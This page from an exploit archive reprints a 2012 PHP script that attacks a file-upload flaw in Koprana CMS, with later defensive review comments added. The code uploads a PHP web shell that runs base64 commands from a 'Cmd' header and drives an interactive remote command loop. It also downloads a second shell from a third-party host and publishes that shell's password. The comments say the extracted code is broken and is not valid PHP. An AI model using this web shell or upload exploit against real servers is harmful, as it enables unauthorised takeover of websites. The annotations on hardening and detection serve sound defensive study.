Home / exploits Koprana CMS Shell Upload
Posted on 11 April 2012
<?php
/*
 * Review annotations (defensive reading of this listing).
 *
 * What the script exercises: a file-upload weakness in Koprana CMS. It builds
 * a multipart POST to {path}index.php?pages=buy1_ontrue with three form
 * fields ("fichier" = the file part, "execute", "dossier" = "./"), a
 * client-chosen filename of sh.php and Content-Type application/x-php, and
 * then expects the file to be served and executed at {path}sh.php. That
 * implies the handler keeps the client-supplied name and extension and writes
 * into a web-served directory where PHP runs. The request carries no cookie
 * or credential header; whether the endpoint is supposed to require a session
 * cannot be told from this page.
 *
 * Hardening that addresses this class of flaw: authenticate and authorise the
 * upload action, allowlist extensions and validate content server-side,
 * ignore the client filename and Content-Type, generate the stored name on
 * the server, keep uploads outside the document root (or disable script
 * execution in the upload directory), and do not let a request field choose
 * the destination directory.
 *
 * Detection points visible in the code:
 *   - POST requests whose query string is pages=buy1_ontrue and whose
 *     multipart body has a "fichier" part with a .php filename;
 *   - HTTP/1.0 GET requests to sh.php carrying a non-standard "Cmd:" request
 *     header with a base64 value;
 *   - responses from that file containing the literal marker _code_;
 *   - an unexpected sh.php next to index.php on disk.
 *
 * Provenance caveats: mode 2 does not ship its payload. It downloads it at
 * run time over plain HTTP from a third-party host with no integrity check,
 * so the uploaded content is whatever that server returns at that moment.
 * The "BHR" download link in the author's note is likewise an unverified
 * third-party binary. The author's comment also publishes a username and
 * password, presumably for that second payload -- TODO confirm; if so, a copy
 * found on a server should be treated as reachable by anyone who has read
 * this page.
 *
 * State of the listing: line breaks and backslash escapes were lost when the
 * page was extracted. The code below is kept as published (only line breaks
 * between statements and comments were added) and is not valid PHP as shown.
 */

//NOTE : - If you are using BHR put this file in exploitswebapp folder
//       - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit

!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode
*/

// Runtime setup: suppress all PHP error output, remove the execution time
// limit, and cap socket waits at 5 seconds.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

/**
 * Send one raw HTTP request and return the raw response.
 *
 * Opens a TCP connection with fsockopen(), writes $packet unchanged, and
 * returns whatever stream_get_contents() reads from the socket (status line,
 * headers and body together). Terminates the script with die() when the
 * connection cannot be opened. The socket is never closed explicitly.
 *
 * @param string $host   Host name or address to connect to.
 * @param mixed  $port   TCP port, passed straight to fsockopen().
 * @param string $packet Complete request text to write to the socket.
 * @return string|false  Raw response as returned by stream_get_contents().
 */
function http_send($host, $port,$packet)
{
    if (!($sock = fsockopen($host, $port))) die(" [-] No response from {$host}:{$port} ");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

// Banner printed on every run.
print " +-----------------------[ The Crazy3D Team ]--------------------------+";
print " | Koprana CMS Remote Upload Exploit |";
print " | by The UnKn0wN |";
print " | Greets to : The Crazy3D members and all Algerian h4x0rs |";
print " +---------------------------------------------------------------------+";
print " | www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print " +---------------------------------------------------------------------+ ";

// Print usage and stop when too few command-line arguments were given.
if ($argc < 3)
{
    print " Usage......: php $argv[0] <host> <path> <mode> ";
    print " Example....: php $argv[0] localhost / 1";
    print " Example....: php $argv[0] localhost /site/ 2 ";
    die();
}

// Positional arguments as the code reads them.
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];

// Mode 1 content: a one-line PHP file that prints the marker _code_ and hands
// the base64-decoded value of the "Cmd" request header to passthru(). Both
// the marker and the header name are usable as detection signatures.
$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
// Mode 2 content: fetched from a remote URL on every run, including runs in
// mode 1, because the fetch is unconditional. Nothing verifies what comes back.
$shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)
if($mode == "2") $shell = $shell2;

// Multipart boundary derived from microtime() with the dot removed.
$boundary = "---------".str_replace(".", "", microtime());

// Multipart body. First part: the file field "fichier", sent with a .php
// filename and a PHP content type -- exactly the combination an upload
// handler should refuse.
$payload = "--{$boundary} ";
$payload .= "Content-Disposition: form-data; name="fichier"; filename="sh.php" ";
$payload .= "Content-Type: application/x-php ";
$payload .= "".$shell." 
";
// Second part: the "execute" field with the value "execute".
$payload .= "--{$boundary} ";
$payload .= "Content-Disposition: form-data; name="execute" execute ";
// Third part: the "dossier" field with the value "./". Presumably this picks
// the destination directory on the server -- TODO confirm against the CMS code.
$payload .= "--{$boundary} ";
$payload .= "Content-Disposition: form-data; name="dossier" ./ ";
$payload .= "--{$boundary}-- ";

// Request head for the upload: HTTP/1.0 POST to the pages=buy1_ontrue page,
// with no cookie or authorisation header.
$packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0 ";
$packet .= "Host: {$host} ";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary} ";
$packet .= "Content-Length: ".strlen($payload)." ";
$packet .= "Connection: keep-alive {$payload}";
// The upload response is discarded, so the script never checks whether the
// server accepted the file.
http_send($host,$port, $packet);

if($mode == "1")
{
    // Request template for the uploaded file; %s is later replaced with a
    // base64 string carried in the non-standard "Cmd" header.
    $packet = "GET {$path}sh.php HTTP/1.0 ";
    $packet .= "Host: {$host} ";
    $packet .= "Cmd: %s ";
    $packet .= "Connection: close ";
    // Probe request sent with the template unformatted (literal %s); only a
    // non-empty response is checked, not the status code.
    if (!($sock = http_send($host,$port, $packet))) die(" [-] Upload failed! ");
    print "[+]Backdoor was upload! [+]Getting the shell... ";
    // Interactive loop: each line read from STDIN is base64-encoded into the
    // header, and everything after the _code_ marker in the response is
    // printed. Typing "exit" ends the loop; a response without the marker
    // ends the script.
    while(1)
    {
        print " BHR@{$host}# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die(" [-] Exploit failed! ");
    }
}else print "Go to {$host}{$path}sh.php to check. "; // any other mode: only report where the file should be
?>
